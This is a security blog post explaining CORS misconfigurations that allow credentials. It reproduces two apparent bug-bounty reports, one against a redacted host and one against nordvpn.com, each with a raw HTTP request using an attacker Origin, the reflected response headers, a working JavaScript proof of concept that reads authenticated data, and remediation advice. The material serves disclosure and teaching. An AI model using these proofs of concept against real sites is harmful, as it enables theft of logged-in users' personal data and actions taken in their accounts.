This blog is all about Cyber Security and IT

CORS[ Cross-Origin Resource Sharing]

About The CORS [ Cross-Origin Resource Sharing]

An cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request. If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information.
This bug could be used to steal users information or force the user to execute unwanted actions. As long that a legit and logged in user is lure to access a attacker controlled HTML page

 

CASE 1

In this report I want to describe High level bug which can seriously compromise a user account.

If I am authorize on this site, I can steal user's sessions, some personal information or do some action.

Steps for reproduce

1) Send this request

GET /api/jsonws/relo-service-plugin-portlet.content/get-content-by-slug/slug/page-ex-link HTTP/1.1
Host: www.█████
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Origin: exploit.com
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

In response headers you can see headers

Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: exploit.com

{F395049}

So you can write exploit:

<!DOCTYPE html>
<html>
   <head>
      <script>
         function cors() {
            var xhttp = new XMLHttpRequest();
                xhttp.onreadystatechange = function() {
                    if (this.readyState == 4 && this.status == 200) {
                        document.getElementById("emo").innerHTML = alert(this.responseText);
            }
         };
         xhttp.open("GET", "https://www.███/api/jsonws/relo-service-plugin-portlet.content/get-content-by-slug/slug/page-ex-link", true);
         xhttp.withCredentials = true;
         xhttp.send();
         }
      </script>
   </head>
   <body>
      <center>
      <h2>CORS PoC Exploit </h2>
      <h3>created by <a href="https://twitter.com/Jarvis7717">@Jarvis</a></h3>
      <h3>Show full content of page</h3>
      <div id="demo">
         <button type="button" onclick="cors()">Exploit</button>
      </div>
   </body>
</html>

Result:
{F395063}

How to fix

Rather than using a wild card or programmatically verifying supplied origins, use a white list of trusted domains.

Impact

Attacker would treat many victims to visit attacker's website, if victim is logged in, then his personal information is recorded in attacker's server. Attacker can perform any action in the user's account, bypassing CSRF tokes.

 

Case 2

CORS misconfiguration is found on https://nordvpn.com/nordvpn.com as "Access-Control-Allow-Origin" is dynamically fetched from client Origin header with "Credentials" set as true.

Steps To Reproduce:
Step 1:
Request:
GET /wp-json/ HTTP/1.1
Host: nordvpn.com
Origin: http://iamsoevil.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response:
HTTP/1.1 200 OK
Date: Sun, 15 Dec 2019 07:03:00 GMT
Content-Type: application/json; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=1800
Expires: Sun, 15 Dec 2019 07:33:00 GMT
Pragma: no-cache
X-Robots-Tag: noindex
Link: https://nordvpn.com/wp-json/; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Access-Control-Allow-Headers: Authorization, Content-Type
Allow: GET
Access-Control-Allow-Origin: http://iamsoevil.com
Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
Vary: Origin
X-Generator: front-kr-web-2
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Cache: MISS
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: HIT
Age: 382
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 54568e251c4bd59b-BOM
Content-Length: 91608

Note: Take note from request I inject a header Origin: http://iamsoevil.com then from response it returns Access-Control-Allow-Origin: http://iamsoevil.com. Which mean there is CORS misconfig here (refer screenshot attached).

Step 2: Exploiting CORS misconfiguration.
1) open https://example.com in browser then inspect the page and go to console. Run the following code in console and you would find it pops up user information or Open above code in any browser and you would find it pops up user information like the attachment.
Code:
<html>
<script>
var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://nordvpn.com/wp-json/wp/v2/users/1',true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); };
</script>
</html>

Remediation:
Rather than using a wildcard or programmatically verifying supplied origins, use a whitelist of trusted domains.

References:
https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties
https://ejj.io/misconfigured-cors/

Reference Reports: #430249 #317391 #426147 #470298

Impact

1) In this report I want to describe High level bug which can seriously compromise a user account.If I am authorize on this site, I can steal user's sessions, some personal information or do some action.
2) Attacker would treat many victims to visit attacker's website, if victim is logged in, then his personal information is recorded in attacker's server.
3) Also If the site specifies the header Access-Control-Allow-Credentials: true, third-party sites may be able to carry out privileged actions and retrieve sensitive information.

 

0 comments:

Post a Comment